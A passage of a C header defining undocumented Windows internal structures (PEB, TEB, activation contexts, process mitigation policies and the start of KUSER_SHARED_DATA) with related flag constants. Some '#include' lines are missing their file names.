ULONG_PTR DefaultThreadpoolCpuSetMasks;
ULONG DefaultThreadpoolCpuSetMaskCount;
ULONG DefaultThreadpoolThreadMaximum;
ULONG HeapMemoryTypeMask; // WIN11
} RTL_USER_PROCESS_PARAMETERS, * PRTL_USER_PROCESS_PARAMETERS;
#define FLG_STOP_ON_EXCEPTION 0x00000001
#define FLG_SHOW_LDR_SNAPS 0x00000002
#define FLG_DEBUG_INITIAL_COMMAND 0x00000004
#define FLG_STOP_ON_HUNG_GUI 0x00000008
#define FLG_HEAP_ENABLE_TAIL_CHECK 0x00000010
#define FLG_HEAP_ENABLE_FREE_CHECK 0x00000020
#define FLG_HEAP_VALIDATE_PARAMETERS 0x00000040
#define FLG_HEAP_VALIDATE_ALL 0x00000080
#define FLG_APPLICATION_VERIFIER 0x00000100
#define FLG_MONITOR_SILENT_PROCESS_EXIT 0x00000200
#define FLG_POOL_ENABLE_TAGGING 0x00000400
#define FLG_HEAP_ENABLE_TAGGING 0x00000800
#define FLG_USER_STACK_TRACE_DB 0x00001000
#define FLG_KERNEL_STACK_TRACE_DB 0x00002000
#define FLG_MAINTAIN_OBJECT_TYPELIST 0x00004000
#define FLG_HEAP_ENABLE_TAG_BY_DLL 0x00008000
#define FLG_DISABLE_STACK_EXTENSION 0x00010000
#define FLG_ENABLE_CSRDEBUG 0x00020000
#define FLG_ENABLE_KDEBUG_SYMBOL_LOAD 0x00040000
#define FLG_DISABLE_PAGE_KERNEL_STACKS 0x00080000
#define FLG_ENABLE_SYSTEM_CRIT_BREAKS 0x00100000
#define FLG_HEAP_DISABLE_COALESCING 0x00200000
#define FLG_ENABLE_CLOSE_EXCEPTIONS 0x00400000
#define FLG_ENABLE_EXCEPTION_LOGGING 0x00800000
#define FLG_ENABLE_HANDLE_TYPE_TAGGING 0x01000000
#define FLG_HEAP_PAGE_ALLOCS 0x02000000
#define FLG_DEBUG_INITIAL_COMMAND_EX 0x04000000
#define FLG_DISABLE_DBGPRINT 0x08000000
#define FLG_CRITSEC_EVENT_CREATION 0x10000000
#define FLG_LDR_TOP_DOWN 0x20000000
#define FLG_ENABLE_HANDLE_EXCEPTIONS 0x40000000
#define FLG_DISABLE_PROTDLLS 0x80000000
typedef struct _PEB {
BOOLEAN InheritedAddressSpace;
BOOLEAN ReadImageFileExecOptions;
BOOLEAN BeingDebugged;
union
{
BOOLEAN BitField;
struct
{
BOOLEAN ImageUsesLargePages : 1;
BOOLEAN IsProtectedProcess : 1;
BOOLEAN IsImageDynamicallyRelocated : 1;
BOOLEAN SkipPatchingUser32Forwarders : 1;
BOOLEAN IsPackagedProcess : 1;
BOOLEAN IsAppContainer : 1;
BOOLEAN IsProtectedProcessLight : 1;
BOOLEAN IsLongPathAwareProcess : 1;
};
};
HANDLE Mutant;
PVOID ImageBaseAddress;
PPEB_LDR_DATA Ldr;
PRTL_USER_PROCESS_PARAMETERS ProcessParameters;
PVOID SubSystemData;
PVOID ProcessHeap;
PRTL_CRITICAL_SECTION FastPebLock;
PSLIST_HEADER AtlThunkSListPtr;
PVOID IFEOKey;
union
{
ULONG CrossProcessFlags;
struct
{
ULONG ProcessInJob : 1;
ULONG ProcessInitializing : 1;
ULONG ProcessUsingVEH : 1;
ULONG ProcessUsingVCH : 1;
ULONG ProcessUsingFTH : 1;
ULONG ProcessPreviouslyThrottled : 1;
ULONG ProcessCurrentlyThrottled : 1;
ULONG ProcessImagesHotPatched : 1; // RS5
ULONG ReservedBits0 : 24;
};
};
union
{
PVOID KernelCallbackTable;
PVOID UserSharedInfoPtr;
};
ULONG SystemReserved;
ULONG AtlThunkSListPtr32;
PVOID ApiSetMap;
ULONG TlsExpansionCounter;
PVOID TlsBitmap;
ULONG TlsBitmapBits[2];
PVOID ReadOnlySharedMemoryBase;
struct _SILO_USER_SHARED_DATA* SharedData;
PVOID* ReadOnlyStaticServerData;
PVOID AnsiCodePageData;
PVOID OemCodePageData;
PVOID UnicodeCaseTableData;
ULONG NumberOfProcessors;
union
{
ULONG NtGlobalFlag;
struct
{
ULONG StopOnException : 1; // FLG_STOP_ON_EXCEPTION
ULONG ShowLoaderSnaps : 1; // FLG_SHOW_LDR_SNAPS
ULONG DebugInitialCommand : 1; // FLG_DEBUG_INITIAL_COMMAND
ULONG StopOnHungGUI : 1; // FLG_STOP_ON_HUNG_GUI
ULONG HeapEnableTailCheck : 1; // FLG_HEAP_ENABLE_TAIL_CHECK
ULONG HeapEnableFreeCheck : 1; // FLG_HEAP_ENABLE_FREE_CHECK
ULONG HeapValidateParameters : 1; // FLG_HEAP_VALIDATE_PARAMETERS
ULONG HeapValidateAll : 1; // FLG_HEAP_VALIDATE_ALL
ULONG ApplicationVerifier : 1; // FLG_APPLICATION_VERIFIER
ULONG MonitorSilentProcessExit : 1; // FLG_MONITOR_SILENT_PROCESS_EXIT
ULONG PoolEnableTagging : 1; // FLG_POOL_ENABLE_TAGGING
ULONG HeapEnableTagging : 1; // FLG_HEAP_ENABLE_TAGGING
ULONG UserStackTraceDb : 1; // FLG_USER_STACK_TRACE_DB
ULONG KernelStackTraceDb : 1; // FLG_KERNEL_STACK_TRACE_DB
ULONG MaintainObjectTypeList : 1; // FLG_MAINTAIN_OBJECT_TYPELIST
ULONG HeapEnableTagByDll : 1; // FLG_HEAP_ENABLE_TAG_BY_DLL
ULONG DisableStackExtension : 1; // FLG_DISABLE_STACK_EXTENSION
ULONG EnableCsrDebug : 1; // FLG_ENABLE_CSRDEBUG
ULONG EnableKDebugSymbolLoad : 1; // FLG_ENABLE_KDEBUG_SYMBOL_LOAD
ULONG DisablePageKernelStacks : 1; // FLG_DISABLE_PAGE_KERNEL_STACKS
ULONG EnableSystemCritBreaks : 1; // FLG_ENABLE_SYSTEM_CRIT_BREAKS
ULONG HeapDisableCoalescing : 1; // FLG_HEAP_DISABLE_COALESCING
ULONG EnableCloseExceptions : 1; // FLG_ENABLE_CLOSE_EXCEPTIONS
ULONG EnableExceptionLogging : 1; // FLG_ENABLE_EXCEPTION_LOGGING
ULONG EnableHandleTypeTagging : 1; // FLG_ENABLE_HANDLE_TYPE_TAGGING
ULONG HeapPageAllocs : 1; // FLG_HEAP_PAGE_ALLOCS
ULONG DebugInitialCommandEx : 1; // FLG_DEBUG_INITIAL_COMMAND_EX
ULONG DisableDbgPrint : 1; // FLG_DISABLE_DBGPRINT
ULONG CritSecEventCreation : 1; // FLG_CRITSEC_EVENT_CREATION
ULONG LdrTopDown : 1; // FLG_LDR_TOP_DOWN
ULONG EnableHandleExceptions : 1; // FLG_ENABLE_HANDLE_EXCEPTIONS
ULONG DisableProtDlls : 1; // FLG_DISABLE_PROTDLLS
} NtGlobalFlags;
};
ULARGE_INTEGER CriticalSectionTimeout;
SIZE_T HeapSegmentReserve;
SIZE_T HeapSegmentCommit;
SIZE_T HeapDeCommitTotalFreeThreshold;
SIZE_T HeapDeCommitFreeBlockThreshold;
ULONG NumberOfHeaps;
ULONG MaximumNumberOfHeaps;
PVOID* ProcessHeaps;
PVOID GdiSharedHandleTable;
PVOID ProcessStarterHelper;
ULONG GdiDCAttributeList;
PRTL_CRITICAL_SECTION LoaderLock;
ULONG OSMajorVersion;
ULONG OSMinorVersion;
USHORT OSBuildNumber;
USHORT OSCSDVersion;
ULONG OSPlatformId;
ULONG ImageSubsystem;
ULONG ImageSubsystemMajorVersion;
ULONG ImageSubsystemMinorVersion;
KAFFINITY ActiveProcessAffinityMask;
GDI_HANDLE_BUFFER GdiHandleBuffer;
PVOID PostProcessInitRoutine;
PVOID TlsExpansionBitmap;
ULONG TlsExpansionBitmapBits[32];
ULONG SessionId;
ULARGE_INTEGER AppCompatFlags;
ULARGE_INTEGER AppCompatFlagsUser;
PVOID pShimData;
PVOID AppCompatInfo;
UNICODE_STRING CSDVersion;
PACTIVATION_CONTEXT_DATA ActivationContextData;
PASSEMBLY_STORAGE_MAP ProcessAssemblyStorageMap;
PACTIVATION_CONTEXT_DATA SystemDefaultActivationContextData;
PASSEMBLY_STORAGE_MAP SystemAssemblyStorageMap;
SIZE_T MinimumStackCommit;
PVOID SparePointers[2];
PVOID PatchLoaderData;
PVOID ChpeV2ProcessInfo;
ULONG AppModelFeatureState;
ULONG SpareUlongs[2];
USHORT ActiveCodePage;
USHORT OemCodePage;
USHORT UseCaseMapping;
USHORT UnusedNlsField;
PVOID WerRegistrationData;
PVOID WerShipAssertPtr;
union
{
PVOID pContextData;
PVOID pUnused;
PVOID EcCodeBitMap;
};
PVOID pImageHeaderHash;
union
{
ULONG TracingFlags;
struct
{
ULONG HeapTracingEnabled : 1;
ULONG CritSecTracingEnabled : 1;
ULONG LibLoaderTracingEnabled : 1;
ULONG SpareTracingBits : 29;
};
};
ULONGLONG CsrServerReadOnlySharedMemoryBase;
PRTL_CRITICAL_SECTION TppWorkerpListLock;
LIST_ENTRY TppWorkerpList;
PVOID WaitOnAddressHashTable[128];
PVOID TelemetryCoverageHeader; // RS3
ULONG CloudFileFlags;
ULONG CloudFileDiagFlags; // RS4
CHAR PlaceholderCompatibilityMode;
CHAR PlaceholderCompatibilityModeReserved[7];
struct _LEAP_SECOND_DATA* LeapSecondData; // RS5
union
{
ULONG LeapSecondFlags;
struct
{
ULONG SixtySecondEnabled : 1;
ULONG Reserved : 31;
};
};
ULONG NtGlobalFlag2;
ULONGLONG ExtendedFeatureDisableMask; // since WIN11
} PEB, * PPEB;
typedef struct _TEB_ACTIVE_FRAME_CONTEXT {
ULONG Flags;
PCSTR FrameName;
} TEB_ACTIVE_FRAME_CONTEXT, *PTEB_ACTIVE_FRAME_CONTEXT;
typedef struct _TEB_ACTIVE_FRAME {
ULONG Flags;
struct _TEB_ACTIVE_FRAME *Previous;
PTEB_ACTIVE_FRAME_CONTEXT Context;
} TEB_ACTIVE_FRAME, *PTEB_ACTIVE_FRAME;
#define GDI_BATCH_BUFFER_SIZE 310
typedef struct _GDI_TEB_BATCH {
ULONG Offset;
UCHAR Alignment[4];
ULONG_PTR HDC;
ULONG Buffer[GDI_BATCH_BUFFER_SIZE];
} GDI_TEB_BATCH, *PGDI_TEB_BATCH;
typedef struct _ACTIVATION_CONTEXT_DATA {
ULONG Magic; //'xtcA'
ULONG HeaderSize;
ULONG FormatVersion;
ULONG TotalSize;
ULONG DefaultTocOffset;
ULONG ExtendedTocOffset;
ULONG AssemblyRosterOffset;
ULONG Flags;
} ACTIVATION_CONTEXT_DATA, * PACTIVATION_CONTEXT_DATA;
typedef struct _ASSEMBLY_STORAGE_MAP_ENTRY {
ULONG Flags;
UNICODE_STRING DosPath;
HANDLE Handle;
} ASSEMBLY_STORAGE_MAP_ENTRY, * PASSEMBLY_STORAGE_MAP_ENTRY;
typedef struct _ASSEMBLY_STORAGE_MAP {
ULONG Flags;
ULONG AssemblyCount;
PASSEMBLY_STORAGE_MAP_ENTRY* AssemblyArray;
} ASSEMBLY_STORAGE_MAP, * PASSEMBLY_STORAGE_MAP;
typedef VOID(NTAPI* PACTIVATION_CONTEXT_NOTIFY_ROUTINE)(
_In_ ULONG NotificationType,
_In_ struct _ACTIVATION_CONTEXT* ActivationContext,
_In_ PACTIVATION_CONTEXT_DATA ActivationContextData,
_In_opt_ PVOID NotificationContext,
_In_opt_ PVOID NotificationData,
_Inout_ PBOOLEAN DisableThisNotification
);
typedef struct _ACTIVATION_CONTEXT {
ULONG RefCount;
ULONG Flags;
LIST_ENTRY Links;
ACTIVATION_CONTEXT_DATA* ActivationContextData;
PACTIVATION_CONTEXT_NOTIFY_ROUTINE NotificationRoutine;
PVOID NotificationContext;
ULONG SendNotifications[4];
ULONG DisabledNotifications[4];
ASSEMBLY_STORAGE_MAP StorageMap;
ASSEMBLY_STORAGE_MAP_ENTRY* InlineStorageMapEntries;
ULONG StackTraceIndex;
PVOID StackTraces[4][4];
} ACTIVATION_CONTEXT, * PACTIVATION_CONTEXT;
typedef struct _RTL_ACTIVATION_CONTEXT_STACK_FRAME {
struct _RTL_ACTIVATION_CONTEXT_STACK_FRAME* Previous;
PACTIVATION_CONTEXT ActivationContext;
ULONG Flags;
} RTL_ACTIVATION_CONTEXT_STACK_FRAME, * PRTL_ACTIVATION_CONTEXT_STACK_FRAME;
typedef struct _ACTIVATION_CONTEXT_STACK {
PRTL_ACTIVATION_CONTEXT_STACK_FRAME ActiveFrame;
LIST_ENTRY FrameListCache;
ULONG Flags;
ULONG NextCookieSequenceNumber;
ULONG StackId;
} ACTIVATION_CONTEXT_STACK, * PACTIVATION_CONTEXT_STACK;
typedef struct _TEB {
NT_TIB NtTib;
PVOID EnvironmentPointer;
CLIENT_ID ClientId;
PVOID ActiveRpcHandle;
PVOID ThreadLocalStoragePointer;
PPEB ProcessEnvironmentBlock;
ULONG LastErrorValue;
ULONG CountOfOwnedCriticalSections;
PVOID CsrClientThread;
PVOID Win32ThreadInfo;
ULONG User32Reserved[26];
ULONG UserReserved[5];
PVOID WOW32Reserved;
LCID CurrentLocale;
ULONG FpSoftwareStatusRegister;
PVOID ReservedForDebuggerInstrumentation[16];
#ifdef _WIN64
PVOID SystemReserved1[30];
#else
PVOID SystemReserved1[26];
#endif
CHAR PlaceholderCompatibilityMode;
BOOLEAN PlaceholderHydrationAlwaysExplicit;
CHAR PlaceholderReserved[10];
ULONG ProxiedProcessId;
ACTIVATION_CONTEXT_STACK ActivationStack;
UCHAR WorkingOnBehalfTicket[8];
NTSTATUS ExceptionCode;
PACTIVATION_CONTEXT_STACK ActivationContextStackPointer;
ULONG_PTR InstrumentationCallbackSp;
ULONG_PTR InstrumentationCallbackPreviousPc;
ULONG_PTR InstrumentationCallbackPreviousSp;
#ifdef _WIN64
ULONG TxFsContext;
#endif
BOOLEAN InstrumentationCallbackDisabled;
#ifdef _WIN64
BOOLEAN UnalignedLoadStoreExceptions;
#endif
#ifndef _WIN64
UCHAR SpareBytes[23];
ULONG TxFsContext;
#endif
GDI_TEB_BATCH GdiTebBatch;
CLIENT_ID RealClientId;
HANDLE GdiCachedProcessHandle;
ULONG GdiClientPID;
ULONG GdiClientTID;
PVOID GdiThreadLocalInfo;
ULONG_PTR Win32ClientInfo[62];
PVOID glDispatchTable[233];
ULONG_PTR glReserved1[29];
PVOID glReserved2;
PVOID glSectionInfo;
PVOID glSection;
PVOID glTable;
PVOID glCurrentRC;
PVOID glContext;
NTSTATUS LastStatusValue;
UNICODE_STRING StaticUnicodeString;
WCHAR StaticUnicodeBuffer[261];
PVOID DeallocationStack;
PVOID TlsSlots[64];
LIST_ENTRY TlsLinks;
PVOID Vdm;
PVOID ReservedForNtRpc;
PVOID DbgSsReserved[2];
ULONG HardErrorMode;
#ifdef _WIN64
PVOID Instrumentation[11];
#else
PVOID Instrumentation[9];
#endif
GUID ActivityId;
PVOID SubProcessTag;
PVOID PerflibData;
PVOID EtwTraceData;
PVOID WinSockData;
ULONG GdiBatchCount;
union
{
PROCESSOR_NUMBER CurrentIdealProcessor;
ULONG IdealProcessorValue;
struct
{
UCHAR ReservedPad0;
UCHAR ReservedPad1;
UCHAR ReservedPad2;
UCHAR IdealProcessor;
};
};
ULONG GuaranteedStackBytes;
PVOID ReservedForPerf;
PVOID ReservedForOle; // tagSOleTlsData
ULONG WaitingOnLoaderLock;
PVOID SavedPriorityState;
ULONG_PTR ReservedForCodeCoverage;
PVOID ThreadPoolData;
PVOID* TlsExpansionSlots;
#ifdef _WIN64
PVOID DeallocationBStore;
PVOID BStoreLimit;
#endif
ULONG MuiGeneration;
ULONG IsImpersonating;
PVOID NlsCache;
PVOID pShimData;
ULONG HeapData;
HANDLE CurrentTransactionHandle;
PTEB_ACTIVE_FRAME ActiveFrame;
PVOID FlsData;
PVOID PreferredLanguages;
PVOID UserPrefLanguages;
PVOID MergedPrefLanguages;
ULONG MuiImpersonation;
union
{
USHORT CrossTebFlags;
USHORT SpareCrossTebBits : 16;
};
union
{
USHORT SameTebFlags;
struct
{
USHORT SafeThunkCall : 1;
USHORT InDebugPrint : 1;
USHORT HasFiberData : 1;
USHORT SkipThreadAttach : 1;
USHORT WerInShipAssertCode : 1;
USHORT RanProcessInit : 1;
USHORT ClonedThread : 1;
USHORT SuppressDebugMsg : 1;
USHORT DisableUserStackWalk : 1;
USHORT RtlExceptionAttached : 1;
USHORT InitialThread : 1;
USHORT SessionAware : 1;
USHORT LoadOwner : 1;
USHORT LoaderWorker : 1;
USHORT SkipLoaderInit : 1;
USHORT SkipFileAPIBrokering : 1;
};
};
PVOID TxnScopeEnterCallback;
PVOID TxnScopeExitCallback;
PVOID TxnScopeContext;
ULONG LockCount;
LONG WowTebOffset;
PVOID ResourceRetValue;
PVOID ReservedForWdf;
ULONGLONG ReservedForCrt;
GUID EffectiveContainerId;
ULONGLONG LastSleepCounter;
ULONG SpinCallCount;
ULONGLONG ExtendedFeatureDisableMask;
} TEB, * PTEB;
typedef struct _PROCESS_DEVICEMAP_INFORMATION {
union {
struct {
HANDLE DirectoryHandle;
} Set;
struct {
ULONG DriveMap;
UCHAR DriveType[32];
} Query;
};
} PROCESS_DEVICEMAP_INFORMATION, *PPROCESS_DEVICEMAP_INFORMATION;
__inline struct _PEB * NtCurrentPeb() { return NtCurrentTeb()->ProcessEnvironmentBlock; }
/*
** PEB/TEB END
*/
/*
** MITIGATION POLICY START
*/
//redefine enum
#define ProcessDEPPolicy 0
#define ProcessASLRPolicy 1
#define ProcessDynamicCodePolicy 2
#define ProcessStrictHandleCheckPolicy 3
#define ProcessSystemCallDisablePolicy 4
#define ProcessMitigationOptionsMask 5
#define ProcessExtensionPointDisablePolicy 6
#define ProcessControlFlowGuardPolicy 7
#define ProcessSignaturePolicy 8
#define ProcessFontDisablePolicy 9
#define ProcessImageLoadPolicy 10
#define ProcessSystemCallFilterPolicy 11
#define ProcessPayloadRestrictionPolicy 12
#define ProcessChildProcessPolicy 13
#define ProcessSideChannelIsolationPolicy 14
#define ProcessUserShadowStackPolicy 15
#define ProcessRedirectionTrustPolicy 16
#define ProcessUserPointerAuthPolicy 17
#define ProcessSEHOPPolicy 18
typedef struct tagPROCESS_MITIGATION_BINARY_SIGNATURE_POLICY_W10 {
union {
DWORD Flags;
struct {
DWORD MicrosoftSignedOnly : 1;
DWORD StoreSignedOnly : 1;
DWORD MitigationOptIn : 1;
DWORD AuditMicrosoftSignedOnly : 1;
DWORD AuditStoreSignedOnly : 1;
DWORD ReservedFlags : 27;
} DUMMYSTRUCTNAME;
} DUMMYUNIONNAME;
} PROCESS_MITIGATION_BINARY_SIGNATURE_POLICY_W10, *PPROCESS_MITIGATION_BINARY_SIGNATURE_POLICY_W10;
typedef struct tagPROCESS_MITIGATION_DYNAMIC_CODE_POLICY_W10 {
union {
DWORD Flags;
struct {
DWORD ProhibitDynamicCode : 1;
DWORD AllowThreadOptOut : 1;
DWORD AllowRemoteDowngrade : 1;
DWORD AuditProhibitDynamicCode : 1;
DWORD ReservedFlags : 28;
} DUMMYSTRUCTNAME;
} DUMMYUNIONNAME;
} PROCESS_MITIGATION_DYNAMIC_CODE_POLICY_W10, *PPROCESS_MITIGATION_DYNAMIC_CODE_POLICY_W10;
typedef struct tagPROCESS_MITIGATION_CONTROL_FLOW_GUARD_POLICY_W10 {
union {
DWORD Flags;
struct {
DWORD EnableControlFlowGuard : 1;
DWORD EnableExportSuppression : 1;
DWORD StrictMode : 1;
DWORD EnableXfg : 1;
DWORD EnableXfgAuditMode : 1;
DWORD ReservedFlags : 27;
} DUMMYSTRUCTNAME;
} DUMMYUNIONNAME;
} PROCESS_MITIGATION_CONTROL_FLOW_GUARD_POLICY_W10, *PPROCESS_MITIGATION_CONTROL_FLOW_GUARD_POLICY_W10;
typedef struct tagPROCESS_MITIGATION_FONT_DISABLE_POLICY_W10 {
union {
DWORD Flags;
struct {
DWORD DisableNonSystemFonts : 1;
DWORD AuditNonSystemFontLoading : 1;
DWORD ReservedFlags : 30;
} DUMMYSTRUCTNAME;
} DUMMYUNIONNAME;
} PROCESS_MITIGATION_FONT_DISABLE_POLICY_W10, *PPROCESS_MITIGATION_FONT_DISABLE_POLICY_W10;
typedef struct tagPROCESS_MITIGATION_IMAGE_LOAD_POLICY_W10 {
union {
DWORD Flags;
struct {
DWORD NoRemoteImages : 1;
DWORD NoLowMandatoryLabelImages : 1;
DWORD PreferSystem32Images : 1;
DWORD AuditNoRemoteImages : 1;
DWORD AuditNoLowMandatoryLabelImages : 1;
DWORD ReservedFlags : 27;
} DUMMYSTRUCTNAME;
} DUMMYUNIONNAME;
} PROCESS_MITIGATION_IMAGE_LOAD_POLICY_W10, *PPROCESS_MITIGATION_IMAGE_LOAD_POLICY_W10;
typedef struct tagPROCESS_MITIGATION_SYSTEM_CALL_FILTER_POLICY_W10 {
union {
ULONG Flags;
struct {
ULONG FilterId : 4;
ULONG ReservedFlags : 28;
} DUMMYSTRUCTNAME;
} DUMMYUNIONNAME;
} PROCESS_MITIGATION_SYSTEM_CALL_FILTER_POLICY_W10, *PPROCESS_MITIGATION_SYSTEM_CALL_FILTER_POLICY_W10;
typedef struct tagPROCESS_MITIGATION_PAYLOAD_RESTRICTION_POLICY_W10 {
union {
ULONG Flags;
struct {
ULONG EnableExportAddressFilter : 1;
ULONG AuditExportAddressFilter : 1;
ULONG EnableExportAddressFilterPlus : 1;
ULONG AuditExportAddressFilterPlus : 1;
ULONG EnableImportAddressFilter : 1;
ULONG AuditImportAddressFilter : 1;
ULONG EnableRopStackPivot : 1;
ULONG AuditRopStackPivot : 1;
ULONG EnableRopCallerCheck : 1;
ULONG AuditRopCallerCheck : 1;
ULONG EnableRopSimExec : 1;
ULONG AuditRopSimExec : 1;
ULONG ReservedFlags : 20;
} DUMMYSTRUCTNAME;
} DUMMYUNIONNAME;
} PROCESS_MITIGATION_PAYLOAD_RESTRICTION_POLICY_W10, *PPROCESS_MITIGATION_PAYLOAD_RESTRICTION_POLICY_W10;
typedef struct tagPROCESS_MITIGATION_CHILD_PROCESS_POLICY_W10 {
union {
ULONG Flags;
struct {
ULONG NoChildProcessCreation : 1;
ULONG AuditNoChildProcessCreation : 1;
ULONG AllowSecureProcessCreation : 1;
ULONG ReservedFlags : 29;
} DUMMYSTRUCTNAME;
} DUMMYUNIONNAME;
} PROCESS_MITIGATION_CHILD_PROCESS_POLICY_W10, *PPROCESS_MITIGATION_CHILD_PROCESS_POLICY_W10;
typedef struct tagPROCESS_MITIGATION_SIDE_CHANNEL_ISOLATION_POLICY_W10 {
union {
DWORD Flags;
struct {
DWORD SmtBranchTargetIsolation : 1;
DWORD IsolateSecurityDomain : 1;
DWORD DisablePageCombine : 1;
DWORD SpeculativeStoreBypassDisable : 1;
DWORD ReservedFlags : 28;
} DUMMYSTRUCTNAME;
} DUMMYUNIONNAME;
} PROCESS_MITIGATION_SIDE_CHANNEL_ISOLATION_POLICY_W10, *PPROCESS_MITIGATION_SIDE_CHANNEL_ISOLATION_POLICY_W10;
typedef struct tagPROCESS_MITIGATION_SYSTEM_CALL_DISABLE_POLICY_W10 {
union {
DWORD Flags;
struct {
DWORD DisallowWin32kSystemCalls : 1;
DWORD AuditDisallowWin32kSystemCalls : 1;
DWORD DisallowFsctlSystemCalls : 1;
DWORD AuditDisallowFsctlSystemCalls : 1;
DWORD ReservedFlags : 28;
} DUMMYSTRUCTNAME;
} DUMMYUNIONNAME;
} PROCESS_MITIGATION_SYSTEM_CALL_DISABLE_POLICY_W10, *PPROCESS_MITIGATION_SYSTEM_CALL_DISABLE_POLICY_W10;
typedef struct tagPROCESS_MITIGATION_USER_SHADOW_STACK_POLICY_W10 {
union {
DWORD Flags;
struct {
DWORD EnableUserShadowStack : 1;
DWORD AuditUserShadowStack : 1;
DWORD SetContextIpValidation : 1;
DWORD AuditSetContextIpValidation : 1;
DWORD EnableUserShadowStackStrictMode : 1;
DWORD BlockNonCetBinaries : 1;
DWORD BlockNonCetBinariesNonEhcont : 1;
DWORD AuditBlockNonCetBinaries : 1;
DWORD CetDynamicApisOutOfProcOnly : 1;
DWORD ReservedFlags : 23;
} DUMMYSTRUCTNAME;
} DUMMYUNIONNAME;
} PROCESS_MITIGATION_USER_SHADOW_STACK_POLICY_W10, * PPROCESS_MITIGATION_USER_SHADOW_STACK_POLICY_W10;
typedef struct tagPROCESS_MITIGATION_REDIRECTION_TRUST_POLICY_W10 {
union {
DWORD Flags;
struct {
DWORD EnforceRedirectionTrust : 1;
DWORD AuditRedirectionTrust : 1;
DWORD ReservedFlags : 30;
} DUMMYSTRUCTNAME;
} DUMMYUNIONNAME;
} PROCESS_MITIGATION_REDIRECTION_TRUST_POLICY_W10, * PPROCESS_MITIGATION_REDIRECTION_TRUST_POLICY_W10;
typedef struct _PROCESS_MITIGATION_USER_POINTER_AUTH_POLICY_W11 {
union {
ULONG Flags;
struct {
ULONG EnablePointerAuthUserIp : 1;
ULONG ReservedFlags : 31;
} DUMMYSTRUCTNAME;
} DUMMYUNIONNAME;
} PROCESS_MITIGATION_USER_POINTER_AUTH_POLICY_W11, * PPROCESS_MITIGATION_USER_POINTER_AUTH_POLICY_W11;
typedef struct _PROCESS_MITIGATION_SEHOP_POLICY_W11 {
union {
ULONG Flags;
struct {
ULONG EnableSehop : 1;
ULONG ReservedFlags : 31;
} DUMMYSTRUCTNAME;
} DUMMYUNIONNAME;
} PROCESS_MITIGATION_SEHOP_POLICY_W11, * PPROCESS_MITIGATION_SEHOP_POLICY_W11;
typedef struct _PROCESS_MITIGATION_POLICY_INFORMATION {
PROCESS_MITIGATION_POLICY Policy;
union
{
PROCESS_MITIGATION_ASLR_POLICY ASLRPolicy;
PROCESS_MITIGATION_STRICT_HANDLE_CHECK_POLICY StrictHandleCheckPolicy;
PROCESS_MITIGATION_SYSTEM_CALL_DISABLE_POLICY_W10 SystemCallDisablePolicy;
PROCESS_MITIGATION_EXTENSION_POINT_DISABLE_POLICY ExtensionPointDisablePolicy;
PROCESS_MITIGATION_DYNAMIC_CODE_POLICY_W10 DynamicCodePolicy;
PROCESS_MITIGATION_CONTROL_FLOW_GUARD_POLICY_W10 ControlFlowGuardPolicy;
PROCESS_MITIGATION_BINARY_SIGNATURE_POLICY_W10 SignaturePolicy;
PROCESS_MITIGATION_FONT_DISABLE_POLICY_W10 FontDisablePolicy;
PROCESS_MITIGATION_IMAGE_LOAD_POLICY_W10 ImageLoadPolicy;
PROCESS_MITIGATION_SYSTEM_CALL_FILTER_POLICY_W10 SystemCallFilterPolicy;
PROCESS_MITIGATION_PAYLOAD_RESTRICTION_POLICY_W10 PayloadRestrictionPolicy;
PROCESS_MITIGATION_CHILD_PROCESS_POLICY_W10 ChildProcessPolicy;
PROCESS_MITIGATION_SIDE_CHANNEL_ISOLATION_POLICY_W10 SideChannelIsolationPolicy;
PROCESS_MITIGATION_USER_SHADOW_STACK_POLICY_W10 UserShadowStackPolicy;
PROCESS_MITIGATION_REDIRECTION_TRUST_POLICY_W10 RedirectionTrustPolicy;
PROCESS_MITIGATION_USER_POINTER_AUTH_POLICY_W11 UserPointerAuthPolicy;
PROCESS_MITIGATION_SEHOP_POLICY_W11 SEHOPPolicy;
};
} PROCESS_MITIGATION_POLICY_INFORMATION, *PPROCESS_MITIGATION_POLICY_INFORMATION;
/*
** MITIGATION POLICY END
*/
/*
** KUSER_SHARED_DATA START
*/
#define NX_SUPPORT_POLICY_ALWAYSOFF 0
#define NX_SUPPORT_POLICY_ALWAYSON 1
#define NX_SUPPORT_POLICY_OPTIN 2
#define NX_SUPPORT_POLICY_OPTOUT 3
#define SEH_VALIDATION_POLICY_ON 0
#define SEH_VALIDATION_POLICY_OFF 1
#define SEH_VALIDATION_POLICY_TELEMETRY 2
#define SEH_VALIDATION_POLICY_DEFER 3
#include
typedef struct _KSYSTEM_TIME {
ULONG LowPart;
LONG High1Time;
LONG High2Time;
} KSYSTEM_TIME, *PKSYSTEM_TIME;
#include
typedef enum _NT_PRODUCT_TYPE {
NtProductWinNt = 1,
NtProductLanManNt,
NtProductServer
} NT_PRODUCT_TYPE, *PNT_PRODUCT_TYPE;
#define PROCESSOR_FEATURE_MAX 64
typedef enum _ALTERNATIVE_ARCHITECTURE_TYPE {
StandardDesign, // None == 0 == standard design
NEC98x86, // NEC PC98xx series on X86
EndAlternatives // past end of known alternatives
} ALTERNATIVE_ARCHITECTURE_TYPE;
//
// Define Address of User Shared Data
//
#define MM_SHARED_USER_DATA_VA 0x000000007FFE0000
//
// WARNING: this definition is OS version dependent.
// Structure maybe incomplete.
//
#include
typedef struct _KUSER_SHARED_DATA {
ULONG TickCountLowDeprecated;
ULONG TickCountMultiplier;
volatile KSYSTEM_TIME InterruptTime;
volatile KSYSTEM_TIME SystemTime;
volatile KSYSTEM_TIME TimeZoneBias;
USHORT ImageNumberLow;
USHORT ImageNumberHigh;
WCHAR NtSystemRoot[260];
ULONG MaxStackTraceDepth;
ULONG CryptoExponent;
ULONG TimeZoneId;
ULONG LargePageMinimum;
union {
ULONG Reserved2[7];
struct {
ULONG AitSamplingValue;
ULONG AppCompatFlag;
struct {
ULONG LowPart;
ULONG HighPart;
} RNGSeedVersion;
ULONG GlobalValidationRunlevel;
LONG TimeZoneBiasStamp;
ULONG NtBuildNumber;
};
};
NT_PRODUCT_TYPE NtProductType;
BOOLEAN ProductTypeIsValid;
UCHAR Reserved0[1];
USHORT NativeProcessorArchitecture;
ULONG NtMajorVersion;
ULONG NtMinorVersion;
BOOLEAN ProcessorFeatures[PROCESSOR_FEATURE_MAX];
ULONG Reserved1;
ULONG Reserved3;
volatile ULONG TimeSlip;
ALTERNATIVE_ARCHITECTURE_TYPE AlternativeArchitecture;
ULONG BootId; //previously AltArchitecturePad
LARGE_INTEGER SystemExpirationDate;
ULONG SuiteMask;
BOOLEAN KdDebuggerEnabled;
union {
UCHAR MitigationPolicies;
struct {
